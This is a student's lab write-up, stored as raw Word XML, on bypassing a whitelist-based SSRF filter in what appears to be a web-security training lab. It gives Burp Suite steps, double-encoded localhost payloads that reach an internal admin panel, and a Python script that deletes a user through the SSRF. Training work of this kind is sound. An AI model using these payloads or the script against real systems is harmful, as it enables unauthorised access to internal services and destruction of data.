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5DF77" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="00865E2F" w:rsidRDefault="00A81D95" w:rsidP="00A81D95">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft YaHei" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00865E2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft YaHei" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2.0 Lab 2: SSRF with whitelist-based input filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AC94C" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="00C87BF9" w:rsidRDefault="00A81D95" w:rsidP="00A81D95">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F594632" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="00C87BF9" w:rsidRDefault="00A81D95" w:rsidP="00A81D95">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:firstLine="72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2.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C87BF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burp suite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6C0FC" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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1. Network Intercept on a webpage (intercept on)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45864EB3" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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9D1A78" wp14:editId="010D221F">
            <wp:extent cx="5722620" cy="2880360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="342453297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53297" name="Picture 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609FC" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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 Send Result to Repeater (intercept off)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39E409" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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Using Repeater to find out localhost and admin page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EDFECB" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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FE2BF66" wp14:editId="68D5987A">
            <wp:extent cx="3726180" cy="5577840"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="152288043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8043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47D34" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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53E3FF" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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5475F67" wp14:editId="7E23DF83">
            <wp:extent cx="5730240" cy="4533900"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="521069292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69292" name="Picture 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E78A4" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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1429069" wp14:editId="31AAF4AC">
            <wp:extent cx="5722620" cy="4572000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1962464617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64617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6FE9A" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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3A21750" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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3.Find Out </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6528D7" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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Website (user site): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC6C3E" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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259C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://stock.weliketoshop.net:8080/product/stock/check?productId=1&amp;storeId=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66313979" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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76C495" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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Localhost:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6031A4" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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259C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost%2523$@stock.weliketoshop.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D2C2F" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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E74C51D" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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Admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BAD2AA" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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8" w:history="1">
        <w:r w:rsidRPr="00C72606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http://localhost%2523$@stock.weliketoshop.net/admin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A307CC7" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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6792CE0" wp14:editId="71BB3E4D">
            <wp:extent cx="5730240" cy="4450080"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="77230531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05316" name="Picture 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FC0E6" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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7520144" wp14:editId="600759C1">
            <wp:extent cx="5722620" cy="4495800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1478935744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35744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812E6" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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C99EC7" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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4. Show result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DD0BFD" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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Action (Hyperlink):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821CC43" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026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11" w:history="1">
        <w:r w:rsidRPr="00C72606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http://localhost%2523$@stock.weliketoshop.net/admin/delete?username=wiener</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43A620FF" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="9026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**Note: Hyperlink to enable delete button function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574CBDD0" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D95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50B28F8" wp14:editId="682F5C20">
            <wp:extent cx="5730240" cy="4488180"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="2104485194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85194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AB2F9" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D95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950CF34" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D95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Result: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C29C213" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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EE3401" wp14:editId="7C4DF848">
            <wp:extent cx="5730240" cy="2735580"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="636997633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97633" name="Picture 9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737FC" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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FB735F" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D95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2.2 Solve with Python Script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85DF85" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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3DCF39F" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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23A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Repositorie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9F523A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/wongyaochang-123/SSRFWhitelist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7AC972" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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Script Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678ED41B" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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565B9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5565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6D6C0AC3" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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565B9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5565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64E5DDD0" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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565B9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5565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>urllib3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="617B61E2" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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5566F577" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>urllib3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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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disable_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005565B9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warnings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565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>urllib3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.exceptions.InsecureRequestWarning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E3B251" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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5F3CB054" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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565B9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proxies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{</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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'http'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: </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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'http://127.0.0.1:8080'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5565B9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'https'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: </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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'http://127.0.0.1:8080'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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36457DBA" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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22F52209" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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565B9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def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565B9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delete_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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65B9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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31278877" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9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delete_user_ssrf_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r w:rsidRPr="005565B9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'http://localhost%2523$%2525@stock.weliketoshop.net/admin/delete?username=carlos'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AB04DC" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9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check_stock_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r w:rsidRPr="005565B9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"/product/stock"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE65EA3" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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params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{</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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565B9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stockApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005565B9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5565B9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delete_user_ssrf_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C97094" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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r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5565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>requests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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5565B9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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9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check_stock_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5565B9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data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5565B9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params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5565B9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verify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5565B9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False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5565B9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proxies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5565B9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proxies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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F09DAD" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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66DDF3BA" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># Check if user was deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDC0667" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9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admin_page_ssrf_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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r w:rsidRPr="005565B9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'http://localhost%2523$%2525@stock.weliketoshop.net/admin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE8378" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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params2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{</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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565B9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stockApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005565B9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5565B9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admin_page_ssrf_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43367BB8" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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r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5565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>requests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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5565B9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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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+ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9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check_stock_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5565B9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data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5565B9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params2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5565B9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verify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5565B9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False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5565B9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proxies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5565B9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proxies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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3515B1" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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if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5565B9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'Carlos'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5565B9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not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5565B9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in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565B9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r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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8DE498" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005565B9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565B9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"(+) Successfully deleted user!"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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D876506" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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else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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3B6DCC" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005565B9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565B9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"(-) Error. User deleted unsuccessfully"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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F0040D" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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1AD83181" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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565B9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def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5565B9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main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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EFDFFA" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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if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565B9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565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sys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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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) != </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777069E9" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005565B9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565B9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"(+) Usage: </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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%s</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005565B9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&gt;"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% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sys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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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[</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C05A8" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005565B9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565B9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"(+) Example: </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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%s</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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www.example.com"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% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sys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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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[</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3291DB2B" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sys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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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(-</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2091D1FF" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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1531E128" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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5565B9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sys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</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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[</w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359773E1" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005565B9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565B9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"(+) Deleting user..."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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4548FF" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005565B9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delete_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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65B9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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E1257" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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1DE253D2" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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565B9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if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5565B9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__name__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== </w:t>
      </w:r>
      <w:r w:rsidRPr="005565B9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"__main__"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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB66C52" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D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   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005565B9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main</w:t>
      </w:r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565B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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07662EC7" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRPr="005565B9" w:rsidRDefault="00A81D95" w:rsidP="00A81D9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761D497A" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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98CE92" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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D399D9D" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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60836C" w14:textId="77777777" w:rsidR="00A81D95" w:rsidRDefault="00A81D95" w:rsidP="00A81D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Result:</w:t>
      </w:r>
    </w:p>
